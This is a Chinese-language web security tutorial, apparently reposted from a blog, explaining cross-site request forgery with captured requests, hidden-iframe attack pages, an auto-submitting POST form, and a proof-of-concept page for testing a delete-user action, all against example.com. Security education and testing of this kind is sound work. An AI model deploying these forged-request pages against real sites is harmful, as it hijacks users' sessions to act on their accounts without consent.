WEB安全--CSRF剖析

标签：帮助   自己   type   抓包   建立   攻击   for   原理   blank   

CSRF攻击：攻击者构造合法的HTTP请求，随后利用用户的身份操作用户帐户的一种攻击方式。

一、CSRF攻击原理
CSRF的攻击建立在浏览器与Web服务器的会话中；欺骗用户访问URL。

二、CSRF攻击场景（GET）
例：
http://www.example.com是全球最大的微博平台，一次偶然的情况，黑客TOM对微博的收听功能做了抓包

GET /listen?uid=218805&listenid=100 HTTP/1.1  
Host: www.example.com 

GET /publish?id=928978 HTTP/1.1  

Host: www.example.com  

<html>  
    <head>  
        <title>  
            逗你玩的。。。  
        </title>  
    </head>  
    <body>  
        你上当了，这不过是个玩笑。<a href="http://www.example.com">单击我返回</a>  
        <iframe src="http://www.example.com/listen?listenid=228820" frameborder="0" width="0px"/>  
        <iframe src="http://www.example.com/publish.php?id=928978" frameborder="0" width="0px"/>  
    </body>  
</html>  

POST /publish HTTP/1.1  
Host:www.example.com  
  
listenid=228820  

<html>  
    <head>  
        <title>  
            post data  
        </title>  
    </head>  
    <body>  
        <form id="myform" method="post" action="http://www.example.com/publish">  
            <input type="hidden" name="listenid" value="228820">  
        </form>  
        <script>  
            var myform = document.getElementById("myform");  
            myform.submit();  
        </script>  
    </body>  
</html>  

四、CSRF的检测

检测CSRF攻击主要分为两种：手工检测和半自动检测。全自动CSRF工具的误报率较大，不予考虑。

4.1 手工检测
在检测CSRF漏洞时，首先需要确定的一点是：CSRF只能通过用户的正规操作进行攻击，实际上就是劫持用户操作。所以，在检测前首先需要确定Web应用程序的所有功能，以及确定哪些操作是敏感的，比如修改密码、转账、发表留言等功能。
确定了敏感性操作后，使用这项“功能”拦截HTTP请求，比如，删除用户操作URL为：http://www.example.com/delUser.action?id=1
编写CSRF POC为：

<html>  
    <body>  
        <form name="myform" action="delUser.action" method="GET">  
            <input type="hidden" name="id" value="5"/>  
        </form>  
        <script>  
            var myform = document.getElementById("myform");  
            myform.submit();  
        </script>  
    </body>  
</html>  

WEB安全--CSRF剖析

标签：帮助   自己   type   抓包   建立   攻击   for   原理   blank   

原文地址：http://www.cnblogs.com/JeSSee/p/6147768.html